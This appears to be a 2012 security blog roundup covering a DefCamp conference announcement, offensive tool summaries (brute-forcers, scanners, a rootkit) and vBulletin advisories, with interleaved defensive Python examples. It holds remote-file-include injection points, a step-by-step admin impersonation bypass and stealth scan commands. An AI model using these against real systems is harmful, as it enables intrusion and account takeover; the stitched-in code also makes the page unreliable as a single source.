DefCamp 2012 – Romania Bucharest
What?
DefCamp 2012 is the second edition of the Romanian conference dedicated to IT security or, as the organizers declare, in-security. The idea of DefCamp came out in March 2011, after some informal discussions between several computer security addicts from Romania, passionate about various INFOSEC topics.
When?
Friday, November 30, 2012 at 9:00 AM - Sunday, December 2, 2012 at 6:00 PM (PST), Bucharest, Romania. 44.441682,26.059049 to be more precise. https://plus.google.com/109940733198368750319/about?gl=ro&hl=ro
Who?
Unlike the first edition of DefCamp, where mostly Romanian underground security specialists and enthusiasts were present, this year the event is backed up by KPMG Romania.
And I really have to mention the following:
- Jim Manico, VP of Security Architecture at WhiteHat Security and VP OWASP with over 16 years of experience in IT security
- Andras Kabai, Senior IT Security Specialist at Deloitte
- Marian Ventuneac, Security Architect at Genworth Financial and Founder OWASP Ireland-Limerick Chapter
- Alexandru Bălan, Chief Security Researcher at Bitdefender
- Adrian Furtună, Security Consultant at KPMG România and international speaker at IT security conferences
- Bogdan Alecu, System Administrator and international speaker at IT security conferences
Some of the topics discussed will be: 0days, captcha breaking, digipass bypass, mobile security, Android malware, DDoS, networking, P2P networks, D&D APTs, social engineering and baking muffins.
Why?
If grey-hat, black-hat, blue-hat or white-hat means more to you than fashion, you should join. There will be security workshops and forensics, cracking, hacking and polo contests. It is also very important to keep up with the latest topics in this very dynamic field.
Another reason to join is to help this event become the best-running hacker convention in Eastern Europe.
Official website: http://www.defcamp.ro/
Official Facebook page: http://www.facebook.com/pages/DefCamp/116250668472724
And: http://www.worldit.info/articole/defcamp-2012-bucuresti-un-eveniment-hipnotizant-tu-ai-vazut-prezentarile/
Buy your ticket here: http://defcamp2012-es2.eventbrite.com/?rank=1#
IronWASP – Iron Web application Advanced Security testing Platform
IronWASP (Iron Web application Advanced Security testing Platform) is an open source system for web application vulnerability testing. It is designed to be customizable to the extent where users can create their own custom security scanners using it. Though an advanced user with Python/Ruby scripting expertise would be able to make full use of the platform, a lot of the tool’s features are simple enough to be used by absolute beginners.
Passive Plug-ins
- Analyzes all traffic going through the tool
- Can also modify the traffic
- Identifies vulnerabilities passively
E.g.: passwords sent over clear text, HttpOnly/Secure flag missing in cookies
Active Plug-ins
- Performs scans against the target to identify vulnerabilities
- Executed only when the user explicitly calls them
- Fine-grained scanning support
E.g.: Cross-site Scripting, SQL Injection
IronWASP performs taint analysis for DOM-based XSS: it identifies sources and sinks and traces them through the code. Custom source and sink objects can also be configured.
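A passive check of the kind the plug-in description above refers to, written as an added example in the scripting language IronWASP exposes to its users; this is not IronWASP code. The captured request/response pair and the list of password field names are constructed assumptions.

```python
"""Passive checks in the spirit of IronWASP's passive plug-ins (added
example, not IronWASP code): inspect one captured request/response pair
without sending traffic and report cookies lacking HttpOnly/Secure and a
password submitted over clear-text HTTP.  The sample exchange and the
password field names are constructed assumptions."""
from urllib.parse import parse_qs, urlsplit

PASSWORD_FIELDS = {"password", "passwd", "pwd", "pass"}  # assumed field names

def check_cookie_flags(set_cookie_headers):
    """Return one finding per cookie attribute that is missing."""
    findings = []
    for header in set_cookie_headers:
        parts = [p.strip() for p in header.split(";")]
        name = parts[0].split("=", 1)[0]
        # Attribute names are case-insensitive; the two flags carry no value
        attrs = {p.split("=", 1)[0].lower() for p in parts[1:]}
        for flag in ("httponly", "secure"):
            if flag not in attrs:
                findings.append(f"cookie {name!r} missing {flag}")
    return findings

def check_cleartext_password(url, body):
    """True if a password-like form field travels over plain http://."""
    if urlsplit(url).scheme.lower() != "http":
        return False
    fields = {k.lower() for k in parse_qs(body, keep_blank_values=True)}
    return bool(fields & PASSWORD_FIELDS)

def passive_scan(url, request_body, response_headers):
    """Run both checks over one exchange; returns the list of findings."""
    findings = check_cookie_flags(
        [v for k, v in response_headers if k.lower() == "set-cookie"])
    if check_cleartext_password(url, request_body):
        findings.append("password submitted over clear-text HTTP")
    return findings

# Constructed sample: a login POST over plain HTTP and its response headers
SAMPLE_URL = "http://shop.example/login"
SAMPLE_BODY = "user=alice&password=hunter2"
SAMPLE_HEADERS = [
    ("Content-Type", "text/html"),
    ("Set-Cookie", "sid=9f3a; Path=/; HttpOnly"),            # no Secure
    ("Set-Cookie", "prefs=dark; Path=/; Secure; HttpOnly"),  # both flags set
    ("Set-Cookie", "tracker=42"),                            # neither flag
]

if __name__ == "__main__":
    for finding in passive_scan(SAMPLE_URL, SAMPLE_BODY, SAMPLE_HEADERS):
        print("[passive]", finding)
```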
web-sorrow – server security scanner
A Perl-based tool for misconfiguration, version detection, enumeration, and server information scanning. Web-Sorrow is a "safe to run" program, meaning it is not designed to attempt to exploit or perform any kind of injection, DDoS/DoS, CSRF, XSS, or other harmful attacks. It is entirely focused on enumeration and collecting info on the target server.
CURRENT functionality:
-S - stands for standard. A set of standard tests that includes: directory indexing testing, banner grabbing, language detection (should be obvious), robots.txt, 200 response testing (some servers send a 200 OK for every request), and thumbs.db scanning
-auth - looks for login pages with a list of some of the most common login files, dirs and admin consoles. The list of URLs doesn't need to be very big, because what else are you going to name it? notAlogin.php???
-Cp - scan with a huge list of plugin dirs. The list is a bit old (the Drupal and WordPress plugin databases are now current, but sorry, Joomla's is still a bit old)
-I - searches the responses for interesting strings
-Ws - looks for web services such as hosting provider, blogging services, favicon fingerprinting, and CMS version info
-Fd - looks for things people generally don't want you to see. The list is generated from a TON of robots.txt files, so whatever it finds should be interesting.
-ninja - a lightweight and undetectable scan that uses bits and pieces from other scans
-R - use HTTP range headers to make scans faster
-Shadow - use Google cache instead of requesting from the target host
-Sd - brute-force subdomains
-Db - brute-force directories with the big DirBuster database
-ua - use a custom User-Agent. PUT UA IN QUOTES if there are spaces
-proxy - send all HTTP requests via a proxy. Example: 255.255.255.254:8080
-e - run all the scans in the tool
web-sorrow also has false-positive checking on most of its requests (it's pretty accurate but not perfect)
EXAMPLES:
- basic: perl Wsorrow.pl -host scanme.nmap.org -S
- stealthy: perl Wsorrow.pl -host scanme.nmap.org -ninja -proxy 190.145.74.10:3128
- scan for login pages: perl Wsorrow.pl -host 192.168.1.1 -auth
- CMS intense scan: perl Wsorrow.pl -host 192.168.1.1 -Ws -Cp all -I
- most intense scan possible: perl Wsorrow.pl -host 192.168.1.1 -e
- dump http headers: perl headerDump.pl
- Check if host is alive: perl hdt.pl -host 192.168.1.1
CONTACT: @flyinpoptartcat
DotDotPwn v3.0 The Directory Traversal Fuzzer
Version: DotDotPwn v3.0
Release date: 03/Feb/2012 (Release at BugCon Security Conferences 2012)
Changes / Enhancements / Features:
- -X switch that implements the bisection algorithm in order to detect the exact depth once a directory traversal vulnerability has been found: http://en.wikipedia.org/wiki/Bisection_method
- -M switch to specify another method different from the default (GET) when the http module is used.
- Other HTTP methods are [POST | HEAD | COPY | MOVE]
- -e switch to specify the file extension to be appended at the end of each fuzz string (e.g. ".php", ".jpg", ".inc")
- New dots & slashes encodings (fuzz patterns) based on: https://www.owasp.org/index.php/Canonicalization,_locale_and_Unicode and http://wikisecure.net/security/uri-encoding-to-bypass-idsips
Supported modules:
- HTTP
- HTTP URL
- FTP
- TFTP
- Payload (Protocol independent)
- STDOUT
Feel free to download this new release from the following sites:
Contact us: dotdotpwn@sectester.net
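The defensive counterpart of the dots-and-slashes encodings DotDotPwn fuzzes, as an added example (not DotDotPwn code): a request path is decoded the way a lax server stack might decode it, undoing nested percent-encoding, the %uXXXX form, overlong UTF-8 and backslashes, and then resolved segment by segment so that anything that would climb above the document root is refused. Which encodings a particular server accepts is an assumption; the function covers the common ones.

```python
"""Defensive counterpart to the dots-and-slashes encodings DotDotPwn fuzzes
(added example, not DotDotPwn code): decode a request path the way a lax
server stack might, then resolve it segment by segment so any attempt to
climb above the document root is refused.  Encodings covered are assumed."""
import posixpath
import re
from urllib.parse import unquote

# Overlong two-byte UTF-8 forms of '.', '/' and '\' that lax decoders accept
OVERLONG = {"%c0%ae": "%2e", "%c0%af": "%2f", "%c1%9c": "%5c"}

def decode_fully(path, max_rounds=3):
    """Strip nested percent-encoding (%252e -> %2e -> .) until it is stable."""
    for _ in range(max_rounds):
        decoded = unquote(path, errors="replace")
        if decoded == path:
            break
        path = decoded
    return path

def canonicalise(raw_path):
    """Return the path relative to the web root, or None if it must be refused."""
    path = re.sub(r"%u00([0-9a-fA-F]{2})", r"%\1", raw_path)  # IIS %u002e form
    for enc, plain in OVERLONG.items():
        path = re.sub(re.escape(enc), plain, path, flags=re.IGNORECASE)
    path = decode_fully(path).replace("\\", "/")  # Windows separators
    if "\x00" in path:  # NUL used to cut off an extension the server appends
        return None
    stack = []
    for segment in path.split("/"):
        if segment in ("", "."):
            continue
        if segment == "..":
            if not stack:  # would climb above the root
                return None
            stack.pop()
        else:
            stack.append(segment)
    return "/".join(stack)

def resolve_under_root(root, raw_path):
    """Map a request path onto a filesystem path under root, or None."""
    rel = canonicalise(raw_path)
    return None if rel is None else posixpath.join(root, rel)

if __name__ == "__main__":
    for p in ("static/./css/../js/app.js", "%252e%252e%252fetc%252fpasswd",
              "..%5c..%5cwindows%5cwin.ini", "%c0%ae%c0%ae/etc/passwd"):
        print(f"{p!r:42} -> {resolve_under_root('/var/www', p)}")
```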
Reaver – brute force Wifi Protected Setup
Reaver implements a brute force attack against Wifi Protected Setup (WPS) registrar PINs in order to recover WPA/WPA2 passphrases, as described in http://sviehb.files.wordpress.com/2011/12/viehboeck_wps.pdf.
Reaver has been designed to be a robust and practical attack against WPS, and has been tested against a wide variety of access points and WPS implementations.
On average Reaver will recover the target AP's plain text WPA/WPA2 passphrase in 4-10 hours, depending on the AP. In practice, it will generally take half this time to guess the correct WPS pin and recover the passphrase.
Patator multi-purpose brute-forcer
Patator is a multi-purpose brute-forcer, with a modular design and a flexible usage.
Currently it supports the following modules:
* ftp_login : Brute-force FTP
* ssh_login : Brute-force SSH
* telnet_login : Brute-force Telnet
* smtp_login : Brute-force SMTP
* smtp_vrfy : Enumerate valid users using the SMTP VRFY command
* smtp_rcpt : Enumerate valid users using the SMTP RCPT TO command
* http_fuzz : Brute-force HTTP/HTTPS
* pop_passd : Brute-force poppassd (not POP3)
* ldap_login : Brute-force LDAP
* smb_login : Brute-force SMB
* mssql_login : Brute-force MSSQL
* oracle_login : Brute-force Oracle
* mysql_login : Brute-force MySQL
* pgsql_login : Brute-force PostgreSQL
* vnc_login : Brute-force VNC
* dns_forward : Forward lookup subdomains
* dns_reverse : Reverse lookup subnets
* snmp_login : Brute-force SNMPv1/2 and SNMPv3
* unzip_pass : Brute-force the password of encrypted ZIP files
* keystore_pass : Brute-force the password of Java keystore files
The name "Patator" comes from http://www.youtube.com/watch?v=xoBkBvnTTjo
Patator is NOT script-kiddie friendly, please read the README inside patator.py before reporting.
vBulletin Multiple Remote File Include Vulnerabilities
vBulletin is prone to multiple remote file-include vulnerabilities because it fails to properly sanitize user-supplied input.
An attacker can exploit these vulnerabilities to obtain potentially sensitive information or to execute arbitrary script code in the context of the webserver process. This may allow the attacker to compromise the application and the computer; other attacks are also possible.
vBulletin 4.1.7 is vulnerable; other versions may also be affected.
http://www.example.com/vB1/api.php?api_script=[RFI]
http://www.example.com/vB1/payment_gateway.php?api[classname]=[RFI]
http://www.example.com/vB1/admincp/cronadmin.php?nextitem[filename]=[RFI]
http://www.example.com/vB1/admincp/diagnostic.php?match[0]=[RFI]
http://www.example.com/vB1/admincp/diagnostic.php?api[classname]=[RFI]
http://www.example.com/vB1/admincp/plugin.php?safeid=[RFI]
http://www.example.com/vB1/includes/class_block.php?file=[RFI]
http://www.example.com/vB1/includes/class_humanverify.php?chosenlib=[RFI]
http://www.example.com/vB1/includes/class_paid_subscription.php?methodinfo[classname]=[RFI]
http://www.example.com/vB1/includes/functions.php?classfile=[RFI]
http://www.example.com/vB1/includes/functions_cron.php?nextitem[filename]=[RFI]
http://www.example.com/vB1/vb/vb.php?filename=[RFI]
http://www.example.com/vB1/install/includes/class_upgrade.php?chosenlib=[RFI]
http://www.example.com/vB1/packages/vbattach/attach.php?package=[RFI]
http://www.example.com/vB1/packages/vbattach/attach.php?path=[RFI]
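An added detection example (not vBulletin or advisory code) that scans web-server access-log lines for requests hitting the script/parameter pairs listed above with a remote URL or PHP stream wrapper as the value. The log lines are constructed; the sink list is copied from the advisory.

```python
"""Detection for the vBulletin remote-file-include pattern listed above (added
example, not vendor code): flag access-log requests that hit one of the
advisory's script/parameter pairs with a remote URL or PHP stream wrapper.
Log lines are constructed; the sink list is copied from the advisory."""
import re
from urllib.parse import parse_qs, urlsplit

RFI_SINKS = {  # (script path, parameter) pairs from the advisory
    ("api.php", "api_script"), ("payment_gateway.php", "api[classname]"),
    ("admincp/cronadmin.php", "nextitem[filename]"),
    ("admincp/diagnostic.php", "match[0]"), ("admincp/diagnostic.php", "api[classname]"),
    ("admincp/plugin.php", "safeid"), ("includes/class_block.php", "file"),
    ("includes/class_humanverify.php", "chosenlib"),
    ("includes/class_paid_subscription.php", "methodinfo[classname]"),
    ("includes/functions.php", "classfile"),
    ("includes/functions_cron.php", "nextitem[filename]"),
    ("vb/vb.php", "filename"), ("install/includes/class_upgrade.php", "chosenlib"),
    ("packages/vbattach/attach.php", "package"), ("packages/vbattach/attach.php", "path"),
}
# Common Log Format; only the client IP and the request target are needed
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "[A-Z]+ (?P<target>\S+) [^"]*"')
# A value is suspicious when it names a remote URL or a PHP stream wrapper
REMOTE_RE = re.compile(r"^(?:https?|ftps?|php|data|phar|expect)://|^//", re.I)

def rfi_attempts(log_lines):
    """Return (client_ip, script, parameter, value) for each matching request."""
    hits = []
    for line in log_lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        url = urlsplit(m["target"])
        params = parse_qs(url.query, keep_blank_values=True)  # decodes api%5Bclassname%5D
        for script, param in sorted(RFI_SINKS):
            if not url.path.endswith("/" + script):
                continue
            for value in params.get(param, []):
                if REMOTE_RE.match(value):
                    hits.append((m["ip"], script, param, value))
    return hits

SAMPLE_LOG = [  # constructed; 203.0.113.0/24 and 198.51.100.0/24 are documentation ranges
    '203.0.113.7 - - [30/Nov/2012:09:12:01 +0200] "GET /vB1/api.php?api_script=http%3A%2F%2F203.0.113.9%2Fshell.txt HTTP/1.1" 200 1843',
    '203.0.113.7 - - [30/Nov/2012:09:12:05 +0200] "GET /vB1/admincp/diagnostic.php?api%5Bclassname%5D=php://input HTTP/1.1" 200 221',
    '198.51.100.4 - - [30/Nov/2012:09:13:10 +0200] "GET /vB1/includes/functions.php?classfile=class_core HTTP/1.1" 200 9034',
    '198.51.100.4 - - [30/Nov/2012:09:13:11 +0200] "GET /vB1/forumdisplay.php?f=12 HTTP/1.1" 200 40211',
]
if __name__ == "__main__":
    for hit in rfi_attempts(SAMPLE_LOG):
        print("RFI attempt from %s on %s?%s=%s" % hit)
```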
Jynx Kit (LD_PRELOAD) Userland Rootkit Released
Jynx Kit is an LD_PRELOAD userland rootkit, fully undetectable by chkrootkit and Rootkit Hunter. It includes a magic-packet SSL reverse back-connect shell triggered by the SEQ/ACK numbers of a single packet. A solid building block for further LD_PRELOAD rootkits.
GXFR – Search Engine Domain Transfer – discover subdomains
Advanced search engine queries to discover subdomains, replicating a DNS zone transfer when zone transfers are disabled on the DNS server. Basically, the technique involves making search engine requests that restrict the URL and site to the target domain. Then, based on the results of the search, exclude the subdomains that are returned. Repeat until the search engine returns 0 results. The final search query excludes all of the public-facing subdomains that the search engine is aware of. Conduct a DNS look-up of each of the identified subdomains, and you've got yourself a DNS zone transfer of all the subdomains with public-facing web servers.
vBulletin – Registration Bypass Vulnerability
1. Check the names of the admins/moderators on the forums
2. Go to Http://[localhost]/path/register.php
3. Type this at User Name ===> ADMIN_username
4.  is an ASCII code
5. complete the other parameters
6. Then click on Complete Registration
7. Now you see that your user name looks like the admin's user name
8. PM the moderators to elevate your account or promote another user. (or other nutty things)
(this is old but it's still working)
Author: Immortal Boy
Iranian Datacoders Security Team
